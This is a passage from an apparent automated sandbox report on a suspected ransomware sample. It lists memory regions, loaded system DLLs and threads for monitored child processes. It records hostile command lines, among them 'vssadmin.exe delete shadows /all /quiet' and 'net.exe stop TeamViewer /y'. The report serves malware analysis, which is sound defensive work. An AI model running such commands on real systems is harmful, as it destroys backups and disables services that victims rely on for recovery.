"pagefile_0x00000000007a0000" filename = "" Region: id = 1108 start_va = 0x930000 end_va = 0x1d2ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000930000" filename = "" Region: id = 1144 start_va = 0x400000 end_va = 0x400fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 1145 start_va = 0x410000 end_va = 0x410fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000410000" filename = "" Region: id = 1146 start_va = 0x1d30000 end_va = 0x1e72fff monitored = 0 entry_point = 0x1d58210 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 1209 start_va = 0x1d30000 end_va = 0x1e0cfff monitored = 0 entry_point = 0x1d8e0b0 region_type = mapped_file name = "rpcss.dll" filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll") Region: id = 1210 start_va = 0x7ff87c640000 end_va = 0x7ff87c64efff monitored = 0 entry_point = 0x7ff87c643210 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 1361 start_va = 0x420000 end_va = 0x420fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000420000" filename = "" Region: id = 1362 start_va = 0x7ff87f9d0000 end_va = 0x7ff87fa76fff monitored = 0 entry_point = 0x7ff87f9db4d0 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 1363 start_va = 0x430000 end_va = 0x430fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000430000" filename = "" Region: id = 1364 start_va = 0x1d30000 end_va = 0x1e0cfff monitored = 0 entry_point = 0x1d8e0b0 region_type = mapped_file name = "rpcss.dll" filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll") Region: id = 1378 start_va = 0x1d30000 end_va = 0x1daffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001d30000" filename = "" Region: id = 1379 start_va = 0x1db0000 end_va = 0x1e2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001db0000" filename = "" Region: id = 1380 start_va = 0x1e30000 end_va = 0x1eaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e30000" filename = "" Region: id = 1389 start_va = 0x1eb0000 end_va = 0x1f8ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 1926 start_va = 0x1f90000 end_va = 0x208ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f90000" filename = "" Region: id = 2004 start_va = 0x2090000 end_va = 0x248afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002090000" filename = "" Thread: id = 11 os_tid = 0x1094 Thread: id = 44 os_tid = 0x1170 Thread: id = 60 os_tid = 0x1118 Thread: id = 62 os_tid = 0xc74 Thread: id = 63 os_tid = 0x8f0 Process: id = "3" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x4a523000" os_pid = "0x1098" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x106c" cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\Windows" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f72e" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 467 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 468 start_va = 0x30000 end_va = 0x44fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 469 start_va = 0x50000 end_va = 0x8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 470 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 471 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 472 start_va = 0x7df5fffc0000 end_va = 0x7df5fffe2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5fffc0000" filename = "" Region: id = 473 start_va = 0x7df5ffff0000 end_va = 0x7ff5fffeffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffff0000" filename = "" Region: id = 474 start_va = 0x7ff642880000 end_va = 0x7ff642890fff monitored = 0 entry_point = 0x7ff6428816b0 region_type = mapped_file name = "conhost.exe" filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe") Region: id = 475 start_va = 0x7ff87ffa0000 end_va = 0x7ff880160fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 601 start_va = 0x490000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000490000" filename = "" Region: id = 602 start_va = 0x7ff87ce40000 end_va = 0x7ff87d027fff monitored = 0 entry_point = 0x7ff87ce6ba70 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 603 start_va = 0x7ff87f640000 end_va = 0x7ff87f6ecfff monitored = 0 entry_point = 0x7ff87f6581a0 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 604 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 605 start_va = 0x7df5ffec0000 end_va = 0x7df5fffbffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffec0000" filename = "" Region: id = 606 start_va = 0x90000 end_va = 0x14dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 607 start_va = 0x7ff87fde0000 end_va = 0x7ff87fe7cfff monitored = 0 entry_point = 0x7ff87fde78a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 608 start_va = 0x150000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 609 start_va = 0x590000 end_va = 0x68ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000590000" filename = "" Region: id = 610 start_va = 0x20000 end_va = 0x26fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 611 start_va = 0x7ff8746c0000 end_va = 0x7ff874718fff monitored = 0 entry_point = 0x7ff8746cfbf0 region_type = mapped_file name = "conhostv2.dll" filename = "\\Windows\\System32\\ConhostV2.dll" (normalized: "c:\\windows\\system32\\conhostv2.dll") Region: id = 634 start_va = 0x190000 end_va = 0x190fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 635 start_va = 0x7ff87f6f0000 end_va = 0x7ff87f96cfff monitored = 0 entry_point = 0x7ff87f7c4970 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 636 start_va = 0x7ff87fe80000 end_va = 0x7ff87ff9bfff monitored = 0 entry_point = 0x7ff87fec02b0 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 637 start_va = 0x7ff87d030000 end_va = 0x7ff87d099fff monitored = 0 entry_point = 0x7ff87d066d50 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 638 start_va = 0x7ff87ed60000 end_va = 0x7ff87eeb5fff monitored = 0 entry_point = 0x7ff87ed6a8d0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 639 start_va = 0x7ff87f3e0000 end_va = 0x7ff87f565fff monitored = 0 entry_point = 0x7ff87f42ffc0 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 640 start_va = 0x1a0000 end_va = 0x1a6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 641 start_va = 0x7ff87d3a0000 end_va = 0x7ff87d4e2fff monitored = 0 entry_point = 0x7ff87d3c8210 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 642 start_va = 0x7ff87f970000 end_va = 0x7ff87f9cafff monitored = 0 entry_point = 0x7ff87f9838b0 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 643 start_va = 0x7ff87d4f0000 end_va = 0x7ff87d52afff monitored = 0 entry_point = 0x7ff87d4f12f0 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 644 start_va = 0x7ff87fa80000 end_va = 0x7ff87fb40fff monitored = 0 entry_point = 0x7ff87faa0da0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 645 start_va = 0x7ff87ab10000 end_va = 0x7ff87ac95fff monitored = 0 entry_point = 0x7ff87ab5d700 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 646 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 647 start_va = 0x1c0000 end_va = 0x1c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 648 start_va = 0x690000 end_va = 0x817fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000690000" filename = "" Region: id = 649 start_va = 0x820000 end_va = 0x9a0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000820000" filename = "" Region: id = 650 start_va = 0x9b0000 end_va = 0x1daffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000009b0000" filename = "" Region: id = 651 start_va = 0x1db0000 end_va = 0x1f1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001db0000" filename = "" Region: id = 657 start_va = 0x400000 end_va = 0x43ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 658 start_va = 0x7ff87d650000 end_va = 0x7ff87ebaefff monitored = 0 entry_point = 0x7ff87d7b11f0 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 659 start_va = 0x7ff87c710000 end_va = 0x7ff87c752fff monitored = 0 entry_point = 0x7ff87c724b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 660 start_va = 0x7ff87c760000 end_va = 0x7ff87cda3fff monitored = 0 entry_point = 0x7ff87c9264b0 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 661 start_va = 0x7ff87fd30000 end_va = 0x7ff87fdd6fff monitored = 0 entry_point = 0x7ff87fd458d0 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 662 start_va = 0x7ff87fb50000 end_va = 0x7ff87fba1fff monitored = 0 entry_point = 0x7ff87fb5f530 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 663 start_va = 0x7ff87c640000 end_va = 0x7ff87c64efff monitored = 0 entry_point = 0x7ff87c643210 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 664 start_va = 0x7ff87c650000 end_va = 0x7ff87c704fff monitored = 0 entry_point = 0x7ff87c6922e0 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 665 start_va = 0x7ff87c5f0000 end_va = 0x7ff87c63afff monitored = 0 entry_point = 0x7ff87c5f35f0 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 666 start_va = 0x7ff87c5d0000 end_va = 0x7ff87c5e3fff monitored = 0 entry_point = 0x7ff87c5d52e0 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 674 start_va = 0x7ff87af40000 end_va = 0x7ff87afd5fff monitored = 0 entry_point = 0x7ff87af65570 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 675 start_va = 0x1db0000 end_va = 0x1ebffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001db0000" filename = "" Region: id = 676 start_va = 0x1f10000 end_va = 0x1f1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f10000" filename = "" Region: id = 727 start_va = 0x1f20000 end_va = 0x2256fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 728 start_va = 0x2260000 end_va = 0x247afff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002260000" filename = "" Region: id = 729 start_va = 0x2480000 end_va = 0x2698fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002480000" filename = "" Region: id = 730 start_va = 0x26a0000 end_va = 0x27acfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026a0000" filename = "" Region: id = 739 start_va = 0x27b0000 end_va = 0x29c5fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000027b0000" filename = "" Region: id = 740 start_va = 0x29d0000 end_va = 0x2adcfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000029d0000" filename = "" Region: id = 773 start_va = 0x440000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 774 start_va = 0x7ff87fbb0000 end_va = 0x7ff87fd09fff monitored = 0 entry_point = 0x7ff87fbf38e0 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 775 start_va = 0x50000 end_va = 0x50fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 776 start_va = 0x590000 end_va = 0x64bfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 777 start_va = 0x680000 end_va = 0x68ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000680000" filename = "" Region: id = 778 start_va = 0x50000 end_va = 0x53fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 779 start_va = 0x7ff87a590000 end_va = 0x7ff87a5b1fff monitored = 0 entry_point = 0x7ff87a591a40 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll") Region: id = 780 start_va = 0x7ff87ad00000 end_va = 0x7ff87ad12fff monitored = 0 entry_point = 0x7ff87ad02760 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 781 start_va = 0x7ff87c3d0000 end_va = 0x7ff87c425fff monitored = 0 entry_point = 0x7ff87c3e0bf0 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 973 start_va = 0x60000 end_va = 0x66fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 974 start_va = 0x70000 end_va = 0x70fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000070000" filename = "" Region: id = 975 start_va = 0x80000 end_va = 0x80fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000080000" filename = "" Region: id = 976 start_va = 0x1d0000 end_va = 0x1d1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 977 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 978 start_va = 0x1f0000 end_va = 0x1f4fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "user32.dll.mui" filename = "\\Windows\\System32\\en-US\\user32.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\user32.dll.mui") Region: id = 979 start_va = 0x480000 end_va = 0x480fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "conhostv2.dll.mui" filename = "\\Windows\\System32\\en-US\\ConhostV2.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\conhostv2.dll.mui") Region: id = 1024 start_va = 0x650000 end_va = 0x651fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000650000" filename = "" Region: id = 1025 start_va = 0x7ff872050000 end_va = 0x7ff8722c3fff monitored = 0 entry_point = 0x7ff8720c0400 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_8c15ae12515e1c22\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_8c15ae12515e1c22\\comctl32.dll") Region: id = 1026 start_va = 0x660000 end_va = 0x660fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "windowsshell.manifest" filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest") Region: id = 1027 start_va = 0x670000 end_va = 0x671fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000670000" filename = "" Thread: id = 12 os_tid = 0x109c Thread: id = 22 os_tid = 0x1038 Thread: id = 23 os_tid = 0x10cc Thread: id = 30 os_tid = 0x754 Process: id = "4" image_name = "net.exe" filename = "c:\\windows\\system32\\net.exe" page_root = "0x4a490000" os_pid = "0x10a0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xe44" cmd_line = "\"C:\\Windows\\System32\\net.exe\" stop TeamViewer /y" cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f72e" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 476 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 477 start_va = 0x30000 end_va = 0x44fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 478 start_va = 0x50000 end_va = 0xcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 479 start_va = 0xd0000 end_va = 0xd3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 480 start_va = 0xe0000 end_va = 0xe0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 481 start_va = 0xf0000 end_va = 0xf1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 482 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 483 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 484 start_va = 0x7df5fffc0000 end_va = 0x7df5fffe2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5fffc0000" filename = "" Region: id = 485 start_va = 0x7df5ffff0000 end_va = 0x7ff5fffeffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffff0000" filename = "" Region: id = 486 start_va = 0x7ff714800000 end_va = 0x7ff71481cfff monitored = 0 entry_point = 0x7ff714802790 region_type = mapped_file name = "net.exe" filename = "\\Windows\\System32\\net.exe" (normalized: "c:\\windows\\system32\\net.exe") Region: id = 487 start_va = 0x7ff87ffa0000 end_va = 0x7ff880160fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 500 start_va = 0x480000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000480000" filename = "" Region: id = 501 start_va = 0x7ff87ce40000 end_va = 0x7ff87d027fff monitored = 0 entry_point = 0x7ff87ce6ba70 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 502 start_va = 0x7ff87f640000 end_va = 0x7ff87f6ecfff monitored = 0 entry_point = 0x7ff87f6581a0 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 503 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 504 start_va = 0x7df5ffec0000 end_va = 0x7df5fffbffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffec0000" filename = "" Region: id = 505 start_va = 0x100000 end_va = 0x1bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1089 start_va = 0x7ff87fde0000 end_va = 0x7ff87fe7cfff monitored = 0 entry_point = 0x7ff87fde78a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 1090 start_va = 0x400000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 1091 start_va = 0x7ff874540000 end_va = 0x7ff87455afff monitored = 0 entry_point = 0x7ff874541040 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\System32\\mpr.dll" (normalized: "c:\\windows\\system32\\mpr.dll") Region: id = 1138 start_va = 0x7ff875230000 end_va = 0x7ff875245fff monitored = 0 entry_point = 0x7ff875231b60 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 1139 start_va = 0x20000 end_va = 0x26fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1140 start_va = 0x7ff87fe80000 end_va = 0x7ff87ff9bfff monitored = 0 entry_point = 0x7ff87fec02b0 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 1141 start_va = 0x7ff875a10000 end_va = 0x7ff875a28fff monitored = 0 entry_point = 0x7ff875a14520 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 1142 start_va = 0x7ff87b9d0000 end_va = 0x7ff87b9dbfff monitored = 0 entry_point = 0x7ff87b9d27e0 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 1143 start_va = 0x7ff86d070000 end_va = 0x7ff86d095fff monitored = 0 entry_point = 0x7ff86d071cf0 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 1169 start_va = 0x580000 end_va = 0x5fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 1170 start_va = 0x7ff875480000 end_va = 0x7ff8754b7fff monitored = 0 entry_point = 0x7ff875498cc0 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 1171 start_va = 0x7ff861250000 end_va = 0x7ff861263fff monitored = 0 entry_point = 0x7ff861251310 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\System32\\browcli.dll" (normalized: "c:\\windows\\system32\\browcli.dll") Region: id = 1172 start_va = 0x7ff87c450000 end_va = 0x7ff87c478fff monitored = 0 entry_point = 0x7ff87c464530 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 1207 start_va = 0x600000 end_va = 0x7effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000600000" filename = "" Region: id = 1208 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Thread: id = 13 os_tid = 0x10a4 Thread: id = 47 os_tid = 0x11ac Thread: id = 49 os_tid = 0x11d0 Process: id = "5" image_name = "vssadmin.exe" filename = "c:\\windows\\system32\\vssadmin.exe" page_root = "0x5bce7000" os_pid = "0x10ac" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xe44" cmd_line = "\"C:\\Windows\\System32\\vssadmin.exe\" delete shadows /all /quiet" cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f72e" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 488 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 489 start_va = 0x30000 end_va = 0x44fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 490 start_va = 0x50000 end_va = 0xcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 491 start_va = 0xd0000 end_va = 0xd3fff monitored = 1 entry_point = 0x0 region_type = 